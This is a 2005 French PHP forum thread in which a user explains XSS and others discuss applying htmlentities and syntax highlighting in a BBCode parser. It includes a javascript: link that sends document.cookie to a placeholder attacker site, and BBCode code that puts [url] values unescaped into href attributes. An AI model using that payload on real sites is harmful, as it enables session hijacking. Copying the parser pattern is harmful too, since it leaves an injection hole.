le code php en couleur
le 01/10/2005 à 18:17
Bzh
XSS = Cross site scripting
Appelé XSS afin de ne pas confondre avec les feuilles de styles CSS !!!
XSS est le fait d' injecter des scripts javascript ou de l' html !!!
La faille se trouve souvent des les forums amateurs.
exemple: <a href="javascript:location='http://ton_site.com/index.php?cookie='+document.cookie"> Cliquez ici pour voir une superbe photo</a>
Je te laisse diviner le danger de ce script !!!
Bye...
En gros le visiteur met ce qu'il veut dans l'objet document.cookie?
le 02/10/2005 à 01:12
Bzh
Heu !!!!
document.cookie renvoit la valeur des cookies !!!
Donc cela veut dire cookie de sessions. Il a donc 180mn pour émuler le cookie et se connecter à la place de la personne...
Il récupère aussi le cookie du choi du design (site multi-couleur), enfin bon pas tellement dangereux mais il récupère aussi le cookie de l' auto-connexion. Et sa beaucoup plus grave. Pour peut que le systeme de gestion des droits d' admin se passe par un cookie, bin il aura tous les droits des admins...
Pas super du tout...
Bye...
yoyo !!
J'ai un soucis,
Quand dois je utiliser le htmlentities?...
J'ai essayer plusieurs solutions qui me mettaient des é ou qui m'affichait le code html de ma balise ]code[ traité avec le hightlight_string :/
voici mon code :
function highlight($tab) {
return highlight_string($tab[1], true);
}
//Je recupère mon texte brut de ma bdd dans $texte ...
$texte=stripslashes(trim($intro['contenu']));
$bbcode= array (
"/\[b\](.+?)\[\/b\]/si",
"/\[i\](.+?)\[\/i\]/si",
"/\[u\](.+?)\[\/u\]/si",
"/\[url=(.+?)\](.+?)\[\/url\]/si",
"/\[url\](.+?)\[\/url\]/si",
"#\[code\](.+)\[/code\]#isU"
);
$htmlcode= array (
"<b>$1</b>",
"<i>$1</i>",
"<u>$1</u>",
"<a href=\"$1\">$2</a>",
"<a href=\"$1\">$1</a>",
"<div class=\"code\"> [code]$1[/code] </div>"
);
$texte=preg_replace($bbcode,$htmlcode,$texte);
$texte = preg_replace_callback('#\[code\](.+)\[/code\]#isU', 'highlight' ,$texte);
echo $texte;
Merci de votre aide :)
le 02/10/2005 à 19:45
Bzh
Tu utilises le htmlentities JUSTE à la sortie de ta base de donnée. SURTOUT pas après avoir généré les balises html pour ton bbcode !!!!
Sinon, là ton bbcode ne te servira plus à rien !!!
bah oui mais je me tape tous les é et compagnie et ma balise code affiche ca :
<?
echo "Je kif le php";
?>
:/
Normal, il ne faut pas faire de htmlentities sur le contenu de [ code ]
J'abuse peut-etre mais comment faire pour appliquer htmlentities sur une partie d'une chaine (sans prendre en compte le code cntenue dans [ code ])
Avec une expression régulière :)
oui justement c'est ca le problème ^^
Trop de mal avec les expressions régulière :/
Va falloir que je m'y mette sérieusement xD
Ecrire un message
Votre message vient d'être créé avec succès.
BB-Code
Pour insérer une URL clickable
Pour insérer une adresse E-mail
Pour annoter
Pour écrire du code
Pour faire un lien vers une fonction PHP
Pour écrire du texte préformaté
Pour écrire du texte en gras
Pour écrire du texte en italique
Pour écrire du texte souligné
Pour écrire du texte barré
Pour écrire un titre principal
Pour écrire un titre secondaire
Pour écrire une liste
Smiley
:bond:
:boxe:
:bsmile:
:bump:
:clap:
:coeur:
:cool:
:cry:
:eek:
:evil:
:fleur:
:fou2:
:fou:
:grin:
:grrr:
:hammer:
:hippy:
:hum:
:idee2:
:idee:
:kdo:
:king:
:ko:
:lol:
:love2:
:love:
:mad:
:maitre:
:noel:
:oops:
:raa:
:razz:
:roll:
:sad:
:skull:
:smile:
:timide:
:trink:
:vice:
:vomi:
:wink:
:zzz:
